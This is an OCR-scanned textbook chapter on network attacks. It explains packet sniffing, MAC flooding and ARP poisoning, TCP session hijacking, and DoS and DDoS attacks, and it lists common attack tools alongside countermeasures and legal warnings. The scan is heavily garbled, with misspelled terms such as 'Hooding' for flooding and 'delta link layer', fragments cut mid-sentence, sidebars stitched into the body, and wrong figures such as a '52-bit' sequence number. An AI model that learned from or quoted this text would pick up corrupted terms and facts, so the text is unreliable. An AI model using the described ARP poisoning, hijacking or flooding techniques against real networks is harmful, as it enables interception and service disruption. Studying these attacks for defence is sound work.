Like most technologies,, sniffers
are not inherently bad or evil —
it all depends on the intent
of the user of the technology.
Sniffers tn the hands of a
be used to diagnose network
problems and uncover design
problems in the network.

277

278

PART 2 A Technical Overview of Hacking

Sniffers rely on the inherent insecurity in networks and the protocols that are in use
on them. Recall that the Transmission Control Protocol/Internet Protocol (TCP/IP) suite
was designed for a more trusting time, and therefore the protocols do not offer much
in the way of security. Several protocols lend themselves to easy sniffing:

that can be easily sniffed.

Hypertext Transfer Protocol [HTTP) — Designed to send information in the clear
without any protection and as such, a good target for sniffing

Simple Mail Transfer Protocol (SMTP} — Commonly used in the transfer of e-mail
the protocol is simple and efficient, but it does not include any protection against
sniffing.

Network News Transfer Protocol (NNTP) — All communication is sent in the clear,

• Post Office Protocol (POP) — Designed to retrieve e-mail from servers, but again
be intercepted
• File Transfer Protocol (FTP) — A protocol designed to send and receive files;
all transmissions are sent in the clear in this protocol,

• Internet Message Access Protocol {I MAP) — Similar to SMTP in function
and lack of protection

• Sniffers are a powerful part of the security professional’s toolkit, offering the ability to
peck into the traffic that is on the network and observe the communications that are
taking place. How does a sniffer gel this ability? Typically a computer system can see only
the communications that are specifically addressed to it or from it. but a sniffer possesses
the ability to see ail communications, whether they are addressed to the listening station
or not. This ability is made possible by switching the network card into promiscuous mode.
Promiscuous mode is the ability of the network card to see all traffic and not just the traffic
specifically addressed to it. Of course, the traffic that a station can see varies depending
on the network design, as you can’t sniff what you can t see. There are two types of
sniffing that can be used to observe traffic: passive and active. Passive sniffing takes place
on networks such as those that have a hub as the connectivity device. With a hub in place,
all stations are on the same collision domain, so all traffic can be seen by all other stations,
In networks that have connectivity hardware that is smarter or more advanced, such as
those with a switch, active sniffing is needed. For example, when a switch is in use. if traffic
is not destined for a specific port, it isn’t even sent to the port; therefore, there is nothing
to observe.

In the Open Systems Interconnection (OSI) reference modeL the sniffer functions at
the delta link layer. This layer is low in the hierarchy of layers > so not much “intelligence”
is present (meaning that little filtering or refinement of the data is occurring), A sniffer

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

279

Before sniffing on any network, make sure you have permission from the network owner.
Sniffing traffic on networks when you do not have permission to do so on can lead to serious
problems up to and including legal repercussions.

According to Title IS, Section 2511 of the U.S. Code r which covers electronic crimes including
those that would fall under the term ” sniffing,” the act of sniffing would be defined as

J ‘ Interception and disclosure of wire, oral, or electronic communications prohibited

(a) intentionally intercepts, endeavors to intercept, or procures any other person to intercept
or endeavor to intercept, any wire, oral, or electronic communication.”

Penalties for engaging in this activity can be anything from fines to civil and criminal penalties.

\< able to capture any and aJ] data thai happens u> pas* hv cm ibe
wire, which even includes data that would otherwise be hidden
by activities occurring at higher layers.

Passive Sniffing

[pNOTE

Understanding the 051
reference model is an
essential skill, and you should
make sure to spend time
reviewing and understanding
the model welL

Passive sniffing works when the traffic you wish to observe and
the station that will do the sniffing are in the same collision domain.
Passive sniffing works when a device known as a hub is in use.
This is the key feature that makes this setup work- Think of the way
a hub functions: traffic that is sent to one port on a hub is automatically sent to all ports
on the hub. lie cause any station can transmit at any time, collisions can and do happen
and can lead to a collision domain. When this type of situation exists, it is possible to listen
in on traffic on the network quite easily because every station shares the same logical
transmission area. What thwarts passive sniffing is a switch that separates the networks
into multiple collision domains, therefore creating a situation in which stations do not
transmit in the same logical area. Basically, passive sniffing is effective when the observer
and the victim exist so that each can see each other’s actions.

Rfl_J-

Sniffing may sound like a formidable threat to the security of information, and it definitely can
be, but it can have its impact blunted to a certain degree. The answer is to use encryption for
data in transit, specifically data that is of an extra -sensitive nature. The rise in usage of protocols
such as Secure Sockets Layer {SSLJ r Internet Protocol Security (IPSec), Secure Shell (SSHJ, and
others has made passive sniffing much less effective. Of course, you should always remember
that encryption can protect information, but use it only when necessary to avoid overburdening
processors on the sending and receiving systems.

2 80 PA RT 2 A Tech n i ea I Overview of H atk i n g

The key to getting the most from passive sniffing is to plan carefully. Look for those
locations, on the network that will act as chokepoints for traffic, or those locations that
the traffic that you are looking for will pass. Placing a sniffer on a collision domain
different from the one that is to be observed will not yield the results that you desire,
so placement must always he considered.

Some points to remember about passive sniffing:

» Passive sniffing is difficult to detect because the attacker does not broadcast
anything on the network as a practice.

• Passive sniffing takes place and is effective when a hub is present.
• Passive sniffing can be done very simply. It can be as simple as an attacker

• Active Sniffing

So what happens if a network is broken into different collision domains using the
power of switches? It would seem in these situations that the target is out of reach,
but this problem can be overcome with the power of active sniffing. Because a switch
limits the traffic, a sniffer can see the traffic that is specifically addressed to a system.
Active sniffing is necessary to see the traffic that is not addressed to that system.

Active sniffing involves sniffing when *) switch is present on the network. This
technique is employed in environments where sniffing using passive methods would
be ineffectual due to the presence of switches. Active sniffing requires the introduction
of traffic onto the network and as such can be delected relatively easily.

In order to use active sniffing, an understanding of two techniques is necessary,
both of which are used to get around the limitations that switches put in place. These
techniques are known as media access control (MAC) Hooding and Address Resolution
Protocol (ARP) poisoning, both of which are valuable tools in your arsenal.

MAC Flooding

The first technique to bypass switches is MAC Hooding: the ability to overwhelm
the switch with traffic designed to cause it to fail. A closer look at this attack reveals
how it succeeds in its task of causing the switch to fail. Switches contain some ti mount
of memory (known as content addressable memory, or CAM I onboard that is used to
build what Is called a lookup table, which is then used to track which MAC addresses
are present on which ports on the switch. This memory allows a lookup to be performed
to let the switch get traffic to the correct port and host as intended. This Lookup table is
built by the switch during normal operation and resides in the CAM. The goal of MAC
Hooding is to exploit a design defect or oversight in some switches, which is that they have
only a limited amount of memory. An attacker can Hood this memory with information
in the form of MAC addresses and fill it up quickly until it cannot hold any more infor-
mation. In the event that this memory fills up, some switches will enter a fail-open state.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

I^fyTj-

Both MAC flooding and ARP poisoning generate some level of activity on the network
and possibly on the clients themselves. This is the drawback of active sniffing: the
introduction of traffic onto the network, and the fact that your presence is now detectable
by anyone or anything that may be looking. Passive sniffing has the advantage of being
much stealthier, as the presence of the sniffer ss not as obvious due to the lack of broadcast
information.

When a switch enters I his fail-open state, the switch now becomes functionally a huh,
and you are back to where you started with passive sniffing. By performing this attack
on a switched network with a vulnerable switch , it is possible to attain a state where
traffic that might not otherwise be sniffed now can be. Of course, you don’t get something
for nothing; in this case, the amount of traffic that is introduced on the network can
make sniffing impossible, as well as send up a huge red ilag to anyone or anything that
may be watching for traffic anomalies.

MAC Hooding involves overwhelming or flooding the switch with a high volume
of requests. This technique overwhelms the memory on the switch used to nrmp MAC
addresses to ports. MAC flooding is performed by sending enough traffic through the
switch that the memory and switch cannot keep up. Once CAM is overwhelmed,
the switch acts like a hub.

To make this attack easy there are a diverse set of tools available for the security
p rofes sional a n d h ac ke r :

• Ether Flood — This utility has the ability to clog a switch and network with
Ethernet frames with bogus, randomized hardware addresses. By flooding the
network with such frames, the net effect is what is expected with MAC flooding:
a switch that fails over to hub behavior.

• SMAC — A MAC spoofing utility that is designed to change the MAC address
of a system to one that the attacker specifies.

In modern operating systems from Windows Xi? forward, and in most
Linux variants, this utility is not even necessary because the MAC address
can be changed in the graphical user interface (CHI) or at the command
line using tools bundled with the operating system (OS) itself.

» Macof — Designed to function like CtherFlood and overwhelm the network
with bogus or false MAC addresses to cause the switch to fail to hub behavior

Technetium MAC Address Changer — Designed to function much like SMAC,
in that it can change the MAC address of a system to one the user desires

282

PART 2 A Technical Overview of Hacking

The other method of bypassing a switch to perform sniffing is via Address Resolution
Protocol (ARP) poisoning. Mere are some key points:

• Address Resolution Protocol (ARP) is a protocol defined at the network layer
which is used to resolve an IP address to a physical or MAC address.
• In order to locate a physical address, the requesting host will broadcast an
ARP request to the network,

• The host that has the IP address that is sought after will return its corresponding

• NOTE

of an interface.

[f you are still unclear

• ARP packets can be spoofed or custom crafted to redirect
traffic to another system such as the attacker’s.

refer to Chapter 2 and the
discussion on ARP and
the OSI reference model.

• ARP poisoning can be used to intercept and redirect traffic
between two systems on the network.

• MAC Hooding can clog and overwhelm a switch’s CAM,
forcing it into what is known as forwarding mode.

Router
!P:1 0.0.0.1

ft/I AC: cc:cc:cc:cc:cc:cc

Modified ARP cache point

IP: 10.0.0.10 to ee:ee:ee:ee:ee:ee:

ARP poisoning
in practice.

Regular
Network
Route

Zelda

IP’ 10.0.0.10 to aa:aa:aa:aa:aa:aa

Modified ARP cache point
IP: 10.0.0,1 1o ee:ee:ee:ee:ee:ee

IP: 10.0.0.3 to ee:ee:ee:ee:ee:ee

Ganon

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

283

With knowledge of the A IIP process in hand, it is very easy to understand the mechanics of
ARP poisoning or ARP spoofing. ARP poisoning works by sending out bogus ARP requests to
tiny requesting device and I he switch. The idea is to force traffic to a location other than the
intended target and therefore sniff what is being sent and received. When the bogus requests
Eire sent out> the switch stores them. Other clients will then automatically send traffic to the
new target, as they will check their cache first where the bogus entry has been stored.

Figure 12-1 illustrates ARP poisoning in practice,

Here are the steps in the process:

NOTE

Not forwarding traffic on
to the original destination
would arouse suspicion
that would tip off the
the attacker’s presence.

1. Attackers send out a broadcast stating that a given IP address
(such as a router or gateway) maps to their own MAC address,
• A victim on the network initiates i\ com mimical ion that
requires exiting the network or subnet.

• When the traffic is transmitted, the A IIP mapping shows that
the router’s IP address maps to a specific MAC address, so traffic
is forwarded to the attacker instead.

• To complete the sequence and avoid arousing suspicion, the
attacker forwards traffic to the real destination (in this case,
the router).

• Here are some points to remember about ARP poisoning:

• Anyo ne can downlo ad malicious so ft w a re u sed to run ARP spoo fing a tta cks
from the Internet.

• Attackers can use bogus ARP messages to redirect traffic.

• It is possible to run DoS attacks with this technique.

• It can be used to intercept and read data,

• It can be used to intercept credentials such as usernames n nd passwords,

• It can be used to alter data in transmission.

• It can be used to tap voice over TP {VoIP) phone calls,

Several utilities in your security professional toolbox are specifically designed to carry out
ARP spoofing, no matter what your OS of choice may be. The following list details some
of the options available to you:

• Arpspoof — Designed to redirect traffic in the form of packets from a victim’s system.
Performs redirection by forging ARP replies. This utility is part of the popular Dsn iff
suite of utilities.

• Cain — The “Swiss army knife 1 ‘ of tools; can perform ARP poisoning, enumeration
of Windows systems, sniffing, and password cracking

■ E tte rca p — An old but very c a pab le p ro toco I a n a lyzer th a t c ei n per form A R 1 y

poisoning, passive sniffing, protocol decoding > and as a packet capture

• Internal Revenue Service (IRS) — Not a port scanner; it is a ” valid source IP address 1 ”
scanner for a given service. Combines ARP poisoning and halt-scan processes and
attempts TCP connections to a specific victim.

284 PART 2 A Technics I Overview of Hacking

ARP Works — Utility for creating customized packets over the network that
perform the ARP announce feature

• Nemesis — Can perform some ARP spoofing

Sniffing Tools

Several very capable sniffing tools are available* including the popular ones in the
following list:

Wireshark — One of the most widely known and used packet sniffers.
Offers a tremendous number of features designed to assist in the dissection
and analysis of traffic. Wireshark is the successor to the Etheral packet sniffer.

• Tcpdump — A well-known command line packet analyzer. Provides the ability
to intercept and observe TCP/IP and other packets during transmission over
the network.
• Win dump — A port of the popular Linux packet sniffer known as TCPdump.
which is a command line tool that is great for displaying header information.
TCPdump Ls available at http://www.tcpduitip.org.

• Omni peek — Manufactured by Wildp tickets, Omni peek is a commercial product
1 1 1 l i L Js t he ‘villi id n 0 1 iJie product Ia luTpuuk,

• Dsn iff — A suite of tools designed to perform sniffing with different protocols with
the intent of intercepting and revealing passwords. Dsn iff is designed for UNIX and
Linux platforms and does not have a complete equivalent on the Windows platform.
• Ether ape — A Linux/UNIX tool that is designed to graphically display the connections
incoming and outgoing from a system

• MSN Sniffer — A sniffing utility specifically designed for sniffing traffic generated
by the MSN messenger application

Netwitness Next gen — A hardware-based sniffer, plus other features, designed
to monitor and analyze all traffic on a network; a popular tool in use by the FBI
and other law enforcement agencies

Not all traffic needs to be
protected, and rt may not
even be feasible to do so.
Remember that all extra
countermeasures that are
deployed are extra devices
and processes to support

on the network.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

285

To defeat sniffing, a number of countermeasures can be employed, including
the following:

• Encryption — Protecting tradie from being sniffed can be as simple as making
it undecipherable to those not having the key. Encrypting select data through
the use of technologies such as IPSec. SSL, virtual private networks (VPNs).

and other related techniques can be a simple but effective way of thwarting sniffing.
The downside here is that the process of encryption costs in processor power
and performance.

• Static ARP entries — Configuring a device with the MAC addresses of the devices
that may use it can block a number of attacks, but can be difficult to m anage.

■ Port security — Switches have the ability to be programmed to allow only specific

W h en c ons i d er in g ne twork sec u r tty a n d t h iv a r t i n g the powe r o f s n i if 5 n g . yo u s h o u Id
consider which protective measures are appropriate and which are not. In the case
of encryption, for example, not all traffic needs to be encrypted because not all network
traffic is of a sensitive nature. Always consider the exact nature of the traffic, too.
Remember, just because you can do something does not mean you should.

Session Hijacking

The next type of attack that can be used to alter and interrupt communications on a
network is the technique known as session hijacking, Hijacking a session falls under the
category of active attacks in that you must directly and somewhat aggressively interact
with the network and the victims on it. Hijacking builds on the techniques discussed in
our previous section of sniffing and raises the stakes by taking over the communication
between two parties. Once attackers decide to undertake a session hijacking, they will
be actively injecting packets into the network with the goal of disrupting and taking over
an existing session on the network. Ultimately the session hijack will attempt to take
over a session that is already authenticated to a resource to be attacked.
Here’s a high-level view of what session hijacking looks like:

1. Insert yourself between Party A and Party Ik
• Monitor the flow of packets using sniffing techniques.

• Analyze and predict the sequence number of the packets.

• Sever the connection between the two parties.

• Seize control of the session.

• Perform packet injection into the network.

• 286 PART 2 A Technical Overview of Hacking

To SEmmariae, session hijacking is the process of to king over an already established
session between two parties, Some points to remember about session hijacking:

• TCP session hijacking is in process when an attacker seizes eontroi of an existing
TCP session between two systems.
• Session hijacking takes place after the authentication process that occurs at the
beginning of a session. Once this process has been undertaken, the session can

• Session hijacking relies on a basic understanding of how messages and their
associated packets flow over the Internet,

• Session hijacking, much like sniffing, has two forms: active and passive* Each form of
session hijacking has its advantages and disadvantages that make it an attractive option
to the attacker. Let’s compare and contrast the two to see what they offer an attacker.

• Active session hijacking — Active attacks are effective and useful to the attacker
because they allow the attacker to search for and take over a session at will.

In active session hijacking, the attacker will search for and take over a session and
then interact with the remaining party as if the attacker were the party that has
been disconnected. The attacker assumes the roie of the party he has displaced,
in other words.

• Passive session hijacking — Passive attacks are different in that the attacker
locates and hijacks a session of interest, but does not interact with the remaining
party. Instead, in passive session hijacking, attackers switch to an observation type
mode where they record and analyze the traffic as it moves. Passive hijacking is
functionally no different from sniffing.

Identifying an Active Session

Earlier, when sniffing was discussed, the process was that of
observing traffic on the network. Session hijacking builds on this
process and refines it. Session hijacking adds the goal of not only
observing the traffic and sessions currently active on the network
but also taking over one of these sessions that has authenticated
access to the resource you want to interact with. For a session
hijack Lo be successful, the aUacker must locate and identify
a suitable session for hijacking. It sounds like a simple process
until factors such as different network segments, switches, and
encryption come into play. If you factor in the very real issue
of having to uncover sequence numbers on packets in order to
properly take control of a session, the challenges mount signifi-
cantly. But they are not insurmountable. Remember that while the
challenges are not small, what is on the line is the ability to interact
with and execute commands against authenticated resources.

NOTE

Session hijacking builds on the
techniques and lessons learned
in passive and active sniffing
so you may want to review
those lessons again if you are
not completely clear on them.
Session hijacking takes sniffing
and moves these lessons to the
next Eevei where you move
from listening to interacting,
which is more aggressive by
nature.

*

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

287

Consider some of the challenges standing in the way of successful session hijacking:

• Sequence numbers — Every packet has a unique 52-bit number embedded into

il s li^cidi 1 )” Lhal i den lilies it and how i1 should be reassembled with Us fellow packets
to regenerate the original message.

• Network segments — When the attacker and victims are on the same network
segment or on a network that uses a hub, observing traffic works like basic sniffing.
However if the victim and the attacker are on two different network segments
separated by a switch, it becomes more difficult to carry out an attack, and
techniques akin to the active sniffing techniques are needed.

Take a look at the sequence number problem. Let’s review the steps involved in session
hijacking once again:

1. Insert yourself between Party A and Party B.
• Monitor the flow of packets using sniffing techniques.

• Analyze and predict the sequence number of the packets.

• Sever the connection between the two parties.

• Seize control of the session.

• Perform packet injection into the network.

• Look at Step 1 — this step is easy on a network on which you can
see both parties. On these types of networks you can sniff the
traffic passively and read the sequence numbers off of the packets
themselves. On a switched network, it becomes much more of
an issue because you cannot see the other party(ies) so you must
use techniques to guess the sequence number correctly (you
can’t just stumble in with whatever number you want). In this
situation > you will send several packets to the victim or target in
order to solicit a response with the sequence numbers on it.

Sequence numbers are a cornerstone of TCP that makes a number of features that you
may take for granted possible. In TCP every piece or byte of data must have a sequence
number assigned to it to track the data, assemble it with its fellow packets, and perform
flow control. So where and when do the sequence numbers get assigned? During the
three-way handshake, which is illustrated in Figure 12-2.

NOTE

In the past, some operating
systems did allow for the
methodical and mathematical
creation of sequence numbers.
This was possible because these
operating systems implemented
very predictable sets of sequence
numbers. Most operating
systems now avoid this by
randomly generating sequence
numbers as a security measure.

1

FY I

Sequence numbers are a 32-bit counter. The possible combinations can be more than 4 billion.

• Sequence numbers are used to tell the receiving machine what order the packets should go

An attacker must successfully guess the sequence numbers in Order to hijack a session,

288

PART 2 A Technical Overview of Hacking

FIGURE 12-2

Three-way handshake.

SYN

SYN-ACK

ACK

i 1

[[ere are some points to bear in mind about sequence number prediction:

• When a client transmits a SYN packet to a server the response will be a SYN-ACK.
This SYN-ACK wilt be responded to with an ACK.

• During this handshake, the starting sequence number will be assigned using
a random method if the operating system supports this function.
• If this sequence number is predictable, the attacker will initiate the connection
to the server with a legitimate address and then open up a second connect from

• Once an attacker has determined the correct sequence numbers, the next move is
to inject packets into the network. Of course, this is easier said than done, and just

injecting packets into the network is not useful! in every
case because a few details must be in place first. Consider
the two extremes of the session: the beginning and the end.
At the beginning of the session, the process of authenti-
cation takes place, and injecting packets into the network
and taking over the session here would be worthless if done
prior to the authentication process (after all, you want an
authenticated session). On the other hand, injecting packets
too late, such as when the session is getting torn down or
closed, will mean that the session you want to hijack is no
longer present.

With the proper sequence numbers predicted and known the attack can move to
the next phase which is to unplug one of the parties, such as a server if one is present.
The goal at this stage is to knock out or remove one of the parties from the commu-
nication in order to get them out of the way. The removal can be performed by any
method the attacker chooses, from a simple DoS to sending a connection reset request
to the victim.

NOTE

You must wait for authentication
to take place prior to taking
over a session because without
doing so you don’t have trust,
and in this case the system you
are trying to interact with has
no knowledge of you.

Seizing Control of a Session

At this point, the attacker now has control of a session and can move toward carrying
out dirty work, whatever it may be. The trick for the attacker u- keep the session
maintained and active because as long as this connection is maintained and kept
alive, the attacker has an authenticated connection to their intended target.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

289

Session Hijacking Tools

]n order to perform session hijacking you can use a number of different tools, each having
use by hackers and will offer you the ability to perform session hijacking quite easily.
Each of these tooi.s is essentially a packet sniffer with the enhanced capability needed
to perform session hijacking.

» Ettercap — An old-school tool that has the advantage of being muitiplatl’orm so you
can learn how to use it on one platform and move those skills over easily to another
platform such as Mac OS X, Ettercap possesses robust capabilities that enable it to
perform its duties quite well. Included in this functionality is the ability to perform
man-in-the-middle attacks, ART spooling, and session hijacking.

• Hunt — This is a commonly used tool for performing session hijacking: in fact, it Is
the first one most hackers and security professionals are introduced to. This software
has the ability to observe and hijack a session between two parties, and also has the
ability to fire off TCP resets to shut down a victim system. This software package

is designed to work on Ethernet-based networks and can work in both passive and
active modes.

• IP Watcher — This utility is a commercial-grade tool ( read: you have to pay for it)
that can perform session hijacking and monitor connections so you can choose
the session you wish to take over.
• T-Sight — Another commercial offering that can hijack TCP sessions on a network
much like IP wale her

• Remote TCP Reset — Is designed to find and reset an existing TCP connection

Thwarting Session Hijacking Attacks

Session hijacking is dangerous. But you can limit its impact to a great degree through
the proper application of your two best lines of defense: being proactive and looking for
the signs of an attack. One of your tools for this is something you read about earlier
encryption. After all it is hard for troublemakers to hijack a session if they can’t see what
is being transmitted. Other measures you can use include configuring routers to block
spoofed traffic from outside the protected network. Additionally, you can use counter-
measures such as an intrusion detection system (IDS) that can watch for suspicious
activity and alert you to it, or even actively block this traffic automatically.

Denial of Service (DoS) Attacks

An older type of attack that still pJ agues the Internet and the computer systems attached
to it is the DoS, which is a threat against one of the core tenets of security: availability.
This makes sense when you consider that a DoS is designed to target a service or resource,
and deny access to it by legitimate users. In this section, you will take a look at this simple
form of hacking: what it can do as well as how it works.

290 PART 2 A Technical Overview of Hacking

NOTE

DoS attacks are commonly
used by those who fall in the
category of script kiddies due
to the relative simplicity of
the attack. DorTt be lulled
into a false sense of security,
hackers have been known to
use this attack as a ; asL resort
(as a way of shutting down a
service that they were unable

MOTE

The use of DoS to extort
money has increased over the
past few years as criminals
using technology.

A DoS functions by tying up valuable resources that coutd
be used to service legitimate needs and users, In essence, a DoS
functions like this: Imagine someone calling your cell phone over
Eind over again; at some point they call often enough that no one
else could call you nor could you call out. At that point you would
become the victim of a DoS. Translate this scenario into the world
of computer networks, and you have a situation where availability
of a service is similarly threatened.

DoS attacks used Lo be used to annoy and irritate a victim, but
over the past few years these attacks have evolved into something
much more ominous: a means to extort money and commit other
crimes. For example, a criminal may contact a victim and ask
for protection money to prevent any unfortunate ‘”accidents”
from happening.

To summarize, the main points of a DoS action are to:

• Deny the use of a system or service through the systematic
w r hich the system becomes unslEihle. substantially? slower, or
overwhelmed to the point it cannot process any more requests.

• Be carried out when an attacker fails at other attempts to
access the system and just decides to shut down a system
in retaliation

Categories of DoS Attacks

DoS attacks are not all the same. They can be broken down into three broad categories
based on how they carry out their goal of denying the service to legitimate uses and users:

• Consumption of bandwidth
• Cons umption of re source s
Exploitation of programming defects

• Consumption of Bandwidth

Bandwidth exhaustion is one of the more common attacks to be observed in the wild.
This type of attack is in effect when the network bandwidth flowing to and from a
machine is consumed to the point of exhaustion. It may seem to some that the solution
here would be to add enough bandwidth that it cannot be easily exhausted, but the
keyword is “easily 1 ‘ exhausted — it does not matter how much bandwidth is allocated
to a system; it is still a finite amount. In fact, an attacker does not have to completely
exhaust bandwidth to and from a system, but rather use up so much of it that perfor-
mance becomes unacceptable to users. So the attacker’s goal is to consume enough
bandwidth to make the service unusable.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

Some well-known forms of attacks in this category include:

• Smurf — Through the exploitation of the Internet Control Message Protocol (ICMP)
and spoofed packets to the broadcast address of a network, the attacker can generate
a torrent of traffic from the sheer number of systems that may reply.

■ Fraggle — This type of attack is similar to the smurf attack with the difference being
what it uses to consume bandwidth. In the case of fraggle attacks, bandwidth is
consumed through the use of Oser Datagram Protocol (UDP) p tickets instead.

• Charger) — This protocol was originally designed for testing and evaluation purposes,
but it can be used to perform a DoS by generating traffic rapidly. By doing so. char gen can
consume the ba nd width on a network rapidly, at which point a DoS will have occurred.

Consumption of Resources

Much like bandwidth consumption, the goal of resource consumption-based attacks is to
eat up a limited resource. However, unlike bandwidth consumption, the goal is not shared
among multiple systems; instead it is targeting the resources on a single system. When an
attack of this nature is carried out. a service or an entire system may become overloaded
to the point where it slows, locks, or crashes.

This type of attack can vary in how it is approached; the following list is some of the
more common forms of this attack:

• SYN flood — This type of attack uses forged packets with the SYN flag set. When
the victim receives enough of the packets, the result is an overwhelmed system
as the SYN flood consumes connection resources to the point where no resources
are available f o r leg i 1 i m a Le connections.

ICMP “flood — This type of attack comes in two variants; smurf attack and ping flood.

• Smurf attack — Carried out when a large amount of traffic is directed to the
to a broadcast address of a network, the request is sent to all hosts on the network,
which respond in turn. However, because the attacker will take the extra step
of configuring the packet with the intended victim as the source, all the hosts on
the network will respond to the victim instead of to the attack. The result is that
a flood of traffic overwhelms the victim causing a DoS.

■ Ping flood — Carried out by sending a large amount of ping p tickets to the victim
with the intent of overwhelming the victim. This attack is incredibly simple, requiring
only basic knowledge of the ping command* the victim’s IP, and more bandwidth
than the victim. In Windows, the command to pull off such an attack would be:

• Teardrop attack — In this type of attack, the attacker manipulates IP packet
fragments in such a way that when reassembled by the victim + a crash occurs.
This process involves having fragments reassembled in illegal ways or having
fragments reassembled into larger packets than the victim can process.

292 PART 2 A Technical Overview of Hacking

• Reflected attack — This type of at I tick is carried oul by spooling or forging the
source address of packets or requests and sending them to numerous systems,
which in turn respond to the requesl .This type of attack is a scaled- up version
of what happens in the ping flood attack.

Exploitation of Programming Defects

Consuming bandwidth isn’t the only way to carry out a DoS attack on a system.
A jiolhi-r is lo exploit kmnvti weaknesses in the system’s design. Vulnerabilities ot 1 1ns
type may have been exposed due to Haws in the system’s design that were inadvertently
put in place by the programmers or developers of the system.

The following list has some of the more common methods of exploiting programming
defects:

Ping of death (PoD) -This type of attack preys upon
the inability of some systems to handle oversized packets.
An attacker sends them out in fragments; when these
fragments reach the system they are reEissembled by the
victim, and when the “magic size” of the 6 5,5 36 bytes
allowed by the TP protocol is reached, some systems will
crash or become victim to a buffer overflow.

• Teardrop — This attack succeeds by exploiting a different
weakness in the way packets are processed by a system.
In this type of attack, the packets are sent in a malformed
state with their offset values adjusted so they overlap, which
is illegal. When a system that does not know how to deal
with this issue is targeted, a crash or lock may result.
• Land — In this type of attack, a packet is sent to a victim
system with the same source and destination address and
port. The result of this action is that systems that do not
know how to process this crash or lock up.

• ^ NOTE

All these attacks have been
around for years and so you
would expect systems to be
designed to be less susceptible
to them. However, this is not the
case. It has been discovered time
and time again that modern
systems from all vendors can
be vulnerable to these attacks
if they are not patched and
managed correctly.

^ NOTE

Some of these tools have been
known to appear on systems
seemingly inexplicably, which
may be a sign of a system that
has become part of a botnet.
which will be discussed later in
this chapter.

Tools for DoS

There are pJenty of tools available to the hacker to perform
a DoS attack, including:

• Jolf2 — A piece of software designed to flood a system
with incorrectly formatted p tickets

• Targa — This software is designed to attempt different types
of attacks and has eight different variations to choose from.

Crazy Pi tiger — This software is designed to send ping packets
of varying sizes and other parameters to a victim.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

293

FYI

Do not be confused — DoS and DDoS attacks are as similar as they are indeed different. The two
share some traits, but vary in others. The two attacks both seek to overwhelm a victim with
requests designed to lock up r slow down, or crash a system. The difference is in implementation
as DoS is generally one system attacking another, and DDoS is many systems attacking another.
It could be said the difference is scale.

hackers keep developing new me I hods of carrying them out.

Some Characteristics of DDoS Attacks

As you can readily imagine, a distributed attack , involving many compromised machines,
is a more devastatingly effective way to commit a denial of service attack than simply
using one machine to attack another. Here are some specifics you should know:

• Attacks of this type are characterized by being very large, using hundreds
or thousands of systems to conduct the attack.
• DDoS has two types of victims; namely, primary and secondary. The former
is the recipient of the actual attack; the latter tire the systems used to launch
the attack itself,

• The attack can he very difficult if not impossible to track back to its true source
because of the sheer number of systems involved.

• Defense is extremely difficult due to the number of attackers, Configuring a router
or firewall to block a small number of single IP addresses is child’s play. Larger
numbers of attackers are nearly impossible to block,

• Impact of this attack is increased over standard DoS because many hosts are involved
in the attack, multiplying the attack’s strength and power,

• A DDoS is an “upgraded” and advanced version of the DoS. The DDoS has the same goal
as the DoS, which is to shut a system down by consuming resources, but does so through
sheer force of numbers. This type of attack generally tends to occur in two waves designed
to position and carry out the attack.

In the first wave, the attack is staged, and the targets that will be the “foot soldiers”
are infected with the implements that will be used to attack the final victim. Targets for
infection in this phase include systems that have high-speed connections, poorly defended
home and business networks, and poorly patched systems. What is infecting these systems
can and will vary* but it could include software such as the ones mentioned previously

A distributed denial of service I DDoS] attack is a powerful tool for those who know how r
to use it. Security professionals have developed techniques to prevent these attacks, hut

Distributed Denial of Service (DDoS) Attacks

294 P A RT 2 A Tech nical Overview of H ack i n§

Wave 2 is the attack itself. Foot soldiers form the army of

systems that will collectively attack a designated target. These

infected systems can number in the thousands, hundreds of

The infected systems are
not always referred to as
“zombies”; they are sometimes
called “hots” (short for robots)
or. like Lhe Borg in S:ar Trek,
“drones.” Whatever you call
them, the goal is the same; to
target a system and steamrolt
it with traffic.

thousands, or even millions awaiting the instruction that will turn
their collective attention toward a target (these infected systems

are called “zombies* }, These are the steps of the attack itself:

• Construct a piece of malware that will transmit packets

to a target net work/ Web site.

• Convert a predefined number of computers to drones,
• Initiate the attack by sending signals to the drones

• to attack a specific target
• Have drones initiate an attack against a target until they

are shut down or disinfected.

A DDoS attack like this sounds simple, but in practice it is not, because it takes quite
a bit of planning and knowledge to set up, not to mention a good amount of patience.
To set this type of attack up, two components are needed: a software component and
a hardware component.

On the software side, two items are needed to make the attack happen:

» Client-side software — This is the software that ultimately will be used to send
command and control requests to launch an attack against the target. This
software will be used by the attacker to initiate the opening stages of the attack,

• Daemon software — This software is resident on the infected systems or hots.
This software is installed on a victim and then waits for instructions to be received.
If you have software of this type installed, you are the one actually attacking

a system.

The second requirement that is essential is the hardwiu u: moR 1 specifically, these are
the systems that will be components of the attack:

• Master or control system — The system responsible for sending out the initial

messages to start the attack: also the system that has the client software present
and installed

Zombie — The system that is the one carrying out the attack against the victim.
The number of zombies can vary wildly in number.

• Target — The system that is the actual victim or recipient of the attack

You may be wondering whether, all things considered, a DDoS is unstoppable,

DDoS attacks rely on locating and using vulnerable hosts that are connected to the
Internet. These systems are then targeted for these known vulnerabilities and taken over.
Once the attack is initiated and the command sent out to the attackers, the DDoS is
nearly impossible to stop.

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks

295

Routers and lire walls may be configured to block the attack, but the attack can
overwhelm these devices and shut down the connection anyway. The sheer volume
of attackers involved to DDoS attacks makes them difficult to stop.

Tools for DDoS

To initiate a DDoS requires the proper tools, and there are a number available. The tool
or tools you use will ultimately depend on what your preferences are as well as other
factors such as platform, but the following list is a sampling of these tools:

• Tribal Flood Network (TFN)— TFN can launch ICMP, Smurf, T1DP, and SYN tlood
attacks at will against an unsuspecting victim. TFN has the distinction of being
the first publicly available DDoS tool.
• Trinoo — Trinoo can claim to be the first widely used DDoS application largely
because it is easy to use and has the ability to command and control many
systems to launch an attack.

• Stacheldraht — The best of both worlds is available in this tooL which offers
features that are seen both in Trinoo and TFN. Stacheldraht uses TCP and ICMP
